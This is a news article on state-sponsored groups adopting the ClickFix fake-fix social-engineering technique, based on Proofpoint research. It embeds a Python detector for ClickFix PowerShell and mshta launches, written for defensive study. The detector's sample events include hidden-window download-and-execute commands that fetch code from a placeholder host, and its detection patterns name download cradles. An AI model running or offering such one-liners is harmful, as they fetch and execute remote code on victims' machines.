Emerging ClickFix Technique Gaining Traction Among State-Sponsored Hackers
Recent investigations by Proofpoint have revealed a significant new trend in the cyber-espionage tactics of government-affiliated hacking groups from North Korea, Iran, and Russia. These actors are now using the ClickFix technique, a social-engineering method that exploits user trust through deceptive error messages or security alerts purporting to come from commonly used software.
A ClickFix attack manipulates the victim into copying and running code in a command-line interface, misleading them into believing they are fixing a legitimate problem. In reality, once run, the code executes harmful commands and compromises the victim’s system.
Proofpoint’s earlier findings, covered by Hackread.com, highlighted an escalation in ClickFix use starting in March 2024. The technique grew increasingly popular among cybercriminals, particularly once groups such as TA571 and ClearFake incorporated it into their operations. Sekoia recorded a marked rise in ClickFix-related incidents in October 2024, involving fake Google Meet, Chrome, and Facebook pages designed to infect users with malware.
The continued use of ClickFix was particularly evident from July 2024 to early 2025, when North Korean, Iranian, and Russian hackers integrated the technique into their operations. In early 2025, the North Korean group TA427, also known as Kimsuky or Emerald Sleet, targeted professionals at five think tanks focused on North Korean affairs. Their approach involved sending deceptive meeting invitations and building fake websites that ultimately led users to execute malicious PowerShell commands. In one notable case, the group impersonated a Japanese diplomat, leading to the installation of the QuasarRAT malware.
Separately, in November 2024, Iran’s TA450 group, known for operations such as MuddyWater, targeted 39 organizations, primarily in the finance and public sectors across the Middle East. Using fraudulent emails posing as Microsoft security updates, the group employed ClickFix to entice users into executing PowerShell commands that installed the Level RMM tool for espionage and data exfiltration. Since that campaign, there have been no indications of further ClickFix operations from this group.
The Russian hacking groups UNK_RemoteRogue and TA422 also feature in this evolving threat landscape. In December 2024, UNK_RemoteRogue carried out a single ClickFix attack against individuals at two leading arms manufacturers, sending emails with embedded links that directed targets to a counterfeit Microsoft Office page, which walked them through executing malicious scripts step by step. Meanwhile, TA422 targeted Ukrainian entities with phishing emails posing as CERT-UA that contained a Google spreadsheet link; the link redirected victims to a reCAPTCHA prompt before executing dangerous PowerShell commands to establish SSH tunnels and deploy the Metasploit framework.
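Detection logic for the pattern the article describes (a victim pasting a download-and-execute PowerShell one-liner), added here as an illustration; it is not Proofpoint’s or the article’s code. It assumes Sysmon-style process-creation records (Image, ParentImage, CommandLine) and that the lure has the victim paste into the Windows Run dialog, so explorer.exe is the interpreter’s parent; the sample events and the host lure.invalid are constructed.

```python
import re
# Interpreters a pasted ClickFix one-liner typically lands in.
SHELL_IMAGES = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")

# Command-line tokens characteristic of download-and-execute one-liners.
INDICATORS = {
    "download_cradle": re.compile(r"\b(iwr|invoke-webrequest|downloadstring|net\.webclient|curl)\b", re.I),
    "inline_eval": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden\b", re.I),
    "encoded_command": re.compile(r"\s-e(nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}

def score_event(event):
    """Score one process-creation record (Sysmon Event ID 1 fields). Returns (score, reasons)."""
    reasons = []
    image = event.get("Image", "").lower().rsplit("\\", 1)[-1]
    parent = event.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    if image not in SHELL_IMAGES:
        return 0, reasons
    # Assumption: the lure has the victim paste into the Run dialog (Win+R),
    # so the interpreter is spawned by the desktop shell, not by a terminal.
    if parent == "explorer.exe":
        reasons.append("spawned_by_explorer")
    for name, pattern in INDICATORS.items():
        if pattern.search(event.get("CommandLine", "")):
            reasons.append(name)
    return len(reasons), reasons

def flag_clickfix(events, threshold=2):
    """Return (event, reasons) pairs at or above the threshold; tune per environment."""
    flagged = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            flagged.append((event, reasons))
    return flagged

SAMPLE_EVENTS = [  # constructed, not real telemetry; lure.invalid is a placeholder host
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr https://lure.invalid/fix.txt)"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell -File C:\scripts\backup.ps1"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://lure.invalid/verify.hta"},
]
```

Of the three constructed records, the hidden-window download cradle and the mshta launch from explorer.exe meet the default threshold, while the scheduled backup script launched from cmd.exe scores zero.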
This evolution of tactics does not suggest a complete overhaul of attack methodologies but represents an adaptation, with ClickFix serving to streamline certain stages of infiltrating target systems and executing malware. Notably, Proofpoint’s research indicates a lack of evidence regarding the use of ClickFix by Chinese government-backed groups, which might stem from limited visibility into their operations.
While ClickFix has not yet become a standardized tool among state-sponsored actors, its rising adoption indicates a potential shift towards more widespread use of this technique in government-backed cyber espionage efforts in the foreseeable future. As the cyber threat landscape evolves, it is crucial for businesses to remain vigilant and informed about emerging tactics and their implications within the MITRE ATT&CK framework, which highlights adversary tactics such as initial access, execution, and persistence that may underpin these attacks.